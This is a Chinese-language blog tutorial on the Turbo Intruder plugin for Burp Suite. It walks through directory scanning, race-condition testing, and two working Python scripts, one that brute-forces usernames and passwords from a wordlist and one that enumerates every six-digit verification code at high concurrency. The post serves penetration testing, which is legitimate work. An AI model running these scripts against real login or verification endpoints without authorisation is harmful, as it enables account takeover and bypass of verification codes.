burp-高速intruder插件


Turbo Intruder简介

Turbo Intruder 是一个BurpSuite插件,用于发送大量HTTP请求并分析结果。它的设计目的是补充 Intruder 的不足,它可以短时间内发送大量的http请求,具体的速度取觉与你的网速, 即使在比较差的公共网络下,它也能每秒发送几百个请求。它可以在几分钟内爆破完百万级的密码字典和目录字典,也可以在一瞬间发送几十个并发请求来测试并发漏洞。

Turbo Intruder安装

该插件可以在BApp Store上安装,找到Turbo Intruderd点击install即可。

image-20210602150209270

Turbo Intruder使用方法

1.目录扫描

抓取要扫描网站的数据包,可以在请求中选中要 fuzz (模糊测试)的点,放到turbo intrudr

image-20210602150647857

%s是用来标记需要fuzz的地方

image-20210602151836168

image-20210602151917001

跑完40万的目录字典花了不到3分钟,比用其它目录扫描工具快多了

image-20210602152601938

2.爆破账号密码

from urllib import quote

def password_brute(target,engine):
 for word in open('/zidian/user500.txt'):
       engine.queue(target.req, quote(word.rstrip()))

def user_brute(target,engine):
 for word in open('/zidian/user500.txt'):
       engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
 for password in open('/zidian/user500.txt'):
   for user in open('/zidian/user500.txt'):
          engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=5,
           requestsPerConnection=100,
           pipeline=True
           )
   #user_brute(target,engine)
   #password_brute(target,engine)
   user_password_brute(target,engine)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
   if req.status == 200:
      table.add(req) 

把脚本往上粘,需要用哪个就把注释删掉,不用的注释掉即可。账号和密码一起跑时,userpassword加上%s

image-20210602154345915

3. 爆破数字验证码

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = '1234567890'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
 if 'error' not in req.response:
      table.add(req)

image-20210602155434713

4.并发漏洞测试

要测并发漏洞时可以用下面自带的脚本,默认循环30个请求

image-20210602155817064

参考链接

https://blog.csdn.net/qq_28205153/article/details/113832488


文章作者: Kz_404
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Kz_404 !
评论
  目录